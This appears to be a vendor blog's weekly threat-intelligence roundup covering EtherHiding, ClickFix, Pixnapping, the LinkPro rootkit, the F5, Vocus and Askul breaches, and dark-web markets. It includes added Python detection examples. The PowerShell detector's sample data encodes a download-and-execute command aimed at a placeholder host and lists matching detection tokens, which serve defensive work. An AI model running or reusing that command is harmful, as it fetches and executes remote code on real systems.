The week witnessed significant nation-state activity, ransomware campaigns, and infrastructure breaches. F5 Networks disclosed a supply chain compromise exposing 600,000+ BIG-IP devices to zero-day exploitation. North Korean APT groups deployed blockchain-based malware through EtherHiding. Vocus telecommunications suffered SIM swap attacks affecting 1,600 customers. Japanese retailer Askul’s ransomware cascaded through Muji and Loft operations.
Key Statistics:
- 600,000+ F5 BIG-IP devices exposed
- 1,600 customers compromised in Vocus breach
- 34 SIM swaps executed via email compromise
- 5 new ransomware groups emerged on dark web
- 36% year-over-year ransomware increase
New Attack Techniques
1. EtherHiding: Blockchain-Based Malware C2
Date: October 15-16, 2025 | Actor: UNC5342 (North Korea)
North Korean state actors pioneered blockchain-hosted malware delivery via smart contracts on Ethereum and BNB Smart Chain. JADESNOW malware queries smart contracts using eth_call (zero gas fee, no transaction record) to fetch encrypted payloads stored as contract data. This provides immutable, takedown-resistant C2 infrastructure indistinguishable from legitimate DeFi traffic. UNC5342 combines this with LinkedIn recruiter spear-phishing targeting developers.
Impact: Cannot be seized or disrupted through traditional ISP/domain takedown methods. Organizations with crypto operations face direct financial exposure.
CISO Takeaway: Monitor egress JSON-RPC queries to public blockchain nodes. Segment crypto wallet access to hardened workstations. Train HR on recruitment-themed social engineering targeting engineers.
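The egress check the takeaway describes, as an added example that is not part of the original post: it parses JSON-RPC bodies that an inspecting proxy has captured (the records, hosts, source addresses and contract address below are all constructed placeholders) and flags read-only contract queries such as eth_call from hosts that are not the sanctioned crypto-ops workstations. Because eth_call leaves no on-chain record, this network-side view is the main handle a defender has.

```python
import json

# Constructed sample of egress HTTP POST records (source, destination host,
# body) as an inspecting proxy might emit them; not real traffic.
SAMPLE_EGRESS = [
    {"src": "10.0.5.23", "host": "rpc.example-node.invalid",
     "body": '{"jsonrpc":"2.0","id":1,"method":"eth_call","params":[{"to":'
             '"0x000000000000000000000000000000000000dead","data":"0x2e64cec1"},"latest"]}'},
    {"src": "10.0.7.4", "host": "api.internal.invalid",
     "body": '{"jsonrpc":"2.0","id":2,"method":"getUser","params":[42]}'},
    {"src": "10.0.5.23", "host": "bsc-rpc.example-node.invalid",
     "body": '[{"jsonrpc":"2.0","id":3,"method":"eth_getStorageAt","params":'
             '["0x000000000000000000000000000000000000dead","0x0","latest"]}]'},
]

# Read-only methods that return contract data without creating a transaction.
READ_ONLY_METHODS = {"eth_call", "eth_getStorageAt", "eth_getCode"}
# Assumed allowlist: the hardened workstations that are permitted to reach chain nodes.
ALLOWED_SOURCES = {"10.0.9.10"}

def parse_jsonrpc(body):
    """Return the list of JSON-RPC 2.0 requests in a body (single or batch), else []."""
    try:
        msg = json.loads(body)
    except json.JSONDecodeError:
        return []
    msgs = msg if isinstance(msg, list) else [msg]
    return [m for m in msgs
            if isinstance(m, dict) and m.get("jsonrpc") == "2.0" and "method" in m]

def flag_blockchain_reads(records, allowed=ALLOWED_SOURCES):
    """Flag read-only contract queries from sources outside the allowlist."""
    findings = []
    for rec in records:
        if rec["src"] in allowed:
            continue
        for msg in parse_jsonrpc(rec["body"]):
            if msg["method"] not in READ_ONLY_METHODS:
                continue
            params = msg.get("params") or []
            first = params[0] if params else None
            # eth_call carries the target in a dict; eth_getStorageAt/eth_getCode as a string
            contract = first.get("to") if isinstance(first, dict) else first
            findings.append({"src": rec["src"], "host": rec["host"],
                             "method": msg["method"], "contract": contract})
    return findings
```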
2. ClickFix: Copy-Paste PowerShell Attacks
Date: October 19, 2025 | Analysis: Microsoft Threat Intelligence
Victims encounter fake error messages instructing them to paste obfuscated PowerShell commands into a terminal. Base64-encoded payloads download LummaS infostealer or remote access trojans. Exploit-to-ransomware timeline: 18 minutes average. 517% surge in H1 2025.
Impact: Bypasses traditional security awareness training. Executes with user intent, evading behavior detection. No file writes: entirely in-memory execution.
CISO Takeaway: Deploy PowerShell Constrained Language Mode. Detect Base64 decoding in CLI execution. Enforce MFA on all remote access assuming credential compromise.
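The "detect Base64 decoding in CLI execution" control, as an added example that is not part of the original post: it triages process-creation command lines (the three samples are constructed, including the encoded payload, which points at an .invalid host), decodes any -EncodedCommand argument from its UTF-16LE form, and reports the flags a SOC rule would key on.

```python
import base64
import re

# Constructed sample command lines as a process-creation log (Sysmon event 1 or
# Windows 4688 CommandLine) would show them; not real telemetry.
_PAYLOAD = "iex (iwr http://example.invalid/stage)"   # constructed decoded content
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -WindowStyle Hidden -enc "
    + base64.b64encode(_PAYLOAD.encode("utf-16le")).decode(),
    "powershell.exe -Command Get-Service",
    "powershell.exe -ExecutionPolicy Bypass -c \"[Text.Encoding]::UTF8.GetString("
    "[Convert]::FromBase64String('SGVsbG8='))\"",
]

# Tokens that, once the payload is decoded, indicate download-and-execute behaviour.
EXEC_INDICATORS = ("iex", "invoke-expression", "downloadstring", "iwr", "invoke-webrequest")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"-e(?:ncodedcommand|ncoded|nco|nc|n|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE), or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16le", errors="replace")

def analyze_powershell(cmdline):
    """Return the detection flags and decoded payload for one command line."""
    low = cmdline.lower()
    flags = []
    if "-windowstyle hidden" in low or re.search(r"-w\s+hidden", low):
        flags.append("hidden_window")
    if "-noprofile" in low or re.search(r"-nop\b", low):
        flags.append("no_profile")
    if "frombase64string" in low:
        flags.append("inline_base64_decode")
    if re.search(r"-ex\w*\s+bypass", low):
        flags.append("exec_policy_bypass")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        flags.append("encoded_command")
        if any(tok in decoded.lower() for tok in EXEC_INDICATORS):
            flags.append("download_and_execute")
    return {"flags": flags, "decoded": decoded}

def triage(cmdlines):
    """Keep only the command lines that carry at least one flag."""
    results = [(c, analyze_powershell(c)) for c in cmdlines]
    return [(c, r) for c, r in results if r["flags"]]
```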
3. Pixnapping: GPU Side-Channel Android Attacks
Date: October 13, 2025 | Disclosure: CMU/UC/UW Researchers
Malicious Android apps (zero permissions required) extract on-screen content via GPU timing side-channels. Attackers steal 2FA codes, banking balances, and private messages by analyzing GPU processing delays. Reconstruction occurs locally in under 30 seconds, with no network traffic to detect.
Impact: Bypasses Android permission model. Works against any app with visual content. Partial Google patches available but modified exploits still function.
CISO Takeaway: Prohibit mobile 2FA for critical systems; use hardware keys instead. Deploy mobile threat defense with app invocation behavior analysis. Limit corporate data on BYOD devices.
4. LinkPro: eBPF Rootkit with Magic Packet Activation
Date: October 13-16, 2025 | Discovery: Synacktiv CSIRT
Advanced Linux rootkit deployed post-Jenkins compromise. eBPF kernel hooks hide files, processes, and loaded eBPF programs from inspection tools. Activates via “magic packets” (specially crafted TCP SYN segments with a specific window size), opening hidden command channels. Persists as a fake systemd-resolveld service.
Technical: XDP/TC eBPF programs intercept packets at driver level before Linux network stack. Filesystem hooks filter getdents64 results. Fallback: /etc/ld.so.preload userspace hooking for older kernels.
Impact: Operates below traditional endpoint detection visibility. Cannot disable eBPF without breaking cloud infrastructure. Malware remains invisible during routine monitoring.
CISO Takeaway: Deploy eBPF-aware monitoring (Falco, bpftool). Isolate Jenkins controllers from internet. Audit systemd units for typo-squatted daemon names. Hunt for /etc/ld.so.preload modifications.
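Two of the hunts in the takeaway, as an added example that is not part of the original post or Synacktiv's tooling: it scores service unit names against a baseline of known daemons to surface typo-squats such as systemd-resolveld, and lists every library path in /etc/ld.so.preload, which on a healthy host is normally absent or empty. The unit list and preload contents below are constructed; the daemon baseline is an assumption to be replaced with the fleet's real inventory.

```python
import os
import subprocess

# Assumed baseline of daemons expected on the fleet; replace with real inventory.
KNOWN_DAEMONS = {"systemd-resolved", "systemd-networkd", "systemd-journald",
                 "systemd-logind", "sshd", "cron", "rsyslog", "dbus"}

# Constructed sample of `systemctl list-unit-files` service names; not from a real host.
SAMPLE_UNITS = ["systemd-resolved.service", "systemd-resolveld.service",
                "sshd.service", "cron.service", "systemd-journal.service"]

# Constructed sample contents of /etc/ld.so.preload.
SAMPLE_PRELOAD = "# comment line\n\n/usr/lib/.hidden/libsys.so\n"

def edit_distance(a, b):
    """Levenshtein distance via the classic two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike_units(unit_names, known=KNOWN_DAEMONS, max_dist=2):
    """Units within max_dist edits of a known daemon name but not equal to it."""
    hits = []
    for unit in unit_names:
        base = unit.rsplit(".", 1)[0]
        if base in known:
            continue
        for legit in known:
            d = edit_distance(base, legit)
            if 0 < d <= max_dist:
                hits.append((unit, legit, d))
                break
    return hits

def preload_entries(content):
    """Library paths listed in ld.so.preload; any entry deserves review."""
    return [ln.strip() for ln in content.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]

def hunt_live_host(preload_path="/etc/ld.so.preload"):
    """Run both checks on the current host (needs systemctl and read access)."""
    out = subprocess.run(["systemctl", "list-unit-files", "--type=service",
                          "--no-legend", "--plain"], capture_output=True, text=True).stdout
    units = [ln.split()[0] for ln in out.splitlines() if ln.strip()]
    preload = open(preload_path).read() if os.path.exists(preload_path) else ""
    return {"lookalikes": lookalike_units(units), "preload": preload_entries(preload)}
```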
Critical Incidents
F5 Networks Supply Chain Breach
Date: August 2025 (detected) | October 15, 2025 (disclosed)
Nation-state attackers maintained persistent access to F5 development infrastructure, exfiltrating BIG-IP source code, engineering documentation, and zero-day vulnerability details. Affects 600,000+ internet-exposed F5 devices globally (130,000+ in US).
Impact: Attackers possess complete F5 architecture understanding enabling custom zero-day exploit development. F5 devices (load balancers, firewalls, VPN concentrators) sit at network perimeters; compromise enables traffic interception and lateral movement. CISA Emergency Directive 26-01 mandates federal agency response within 7 days.
CISO Takeaway: Immediately apply F5 security patches. Disconnect F5 management interfaces from internet access. Deploy enhanced monitoring for F5-specific configuration changes and unauthorized administrative access. Assume zero-days exist in current deployments.
Vocus Group Telecommunications Breach
Date: October 17, 2025
Australian ISP Vocus suffered targeted compromise affecting 1,600 email accounts and 34 SIM swaps. Attackers accessed customer data from compromised email systems, extracted authentication details, purchased SIM cards, and fraudulently ported mobile numbers to attacker-controlled devices.
Impact: SIM swap victims face unauthorized access to SMS-based 2FA for banking, cryptocurrency exchanges, and email recovery. Demonstrates cascading attack from email compromise to financial fraud. Follows pattern: Optus (2022), Medibank (2022), Latitude Financial (2023).
CISO Takeaway: Telecom providers must require in-person ID verification for SIM changes. Implement non-SMS 2FA (hardware keys, authenticator apps) for sensitive accounts. Deploy SIM swap detection alerting customers of activation requests.
Askul Japan Ransomware Attack
Date: October 19-20, 2025
Japanese office supply logistics hub Askul suffered weekend ransomware attack, suspending e-commerce operations across three platforms. Cascaded to downstream retailers: Muji (halted online sales), Loft (fulfillment delays), Sogo & Seibu (partial outages). Demonstrates single-vendor logistics dependency risk.
Impact: Operational paralysis during peak retail season. 34 million+ individuals potentially affected indirectly. Supply chain disruption exposes third-party risk in centralized logistics models.
CISO Takeaway: Implement vendor risk management and security assessments. Establish business continuity plans with alternative logistics providers. Maintain buffer inventory reducing just-in-time dependency. Conduct vendor incident response tabletop exercises.
Dark Web Activity
New Ransomware Groups: Kyber, Nasir Security, Kryptos, Tengu, VFVCT emerged this week.
Established Activity: Qilin (19 victims), Akira (11 victims), INC (9 healthcare victims), RansomHub posted fresh victims.
DarkForums: 12,767+ members trading stolen data: South Korean credentials (45K), Vietnamese airline records (23M), alleged Huawei IP.
RAMP Marketplace: Compromised Fortune 500 VPN credentials ($5K-$50K), RDP access ($500-$5K), cloud infrastructure with admin rights ($5K-$25K).
Cryptocurrency Laundering: Shared wallet infrastructure among Kairos, Qilin, INC, SafePay. Increased privacy coin usage (Monero, Zcash).
CISO Takeaway: Monitor dark web for organizational mentions on leak sites. Assume breach as operational baseline. Maintain offline, immutable backups. Deploy 24/7 SOC with ransomware playbooks.
Outpace Attackers With AI-Based Automated Penetration Testing With FireCompass:
FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing & NextGen Attack Surface Management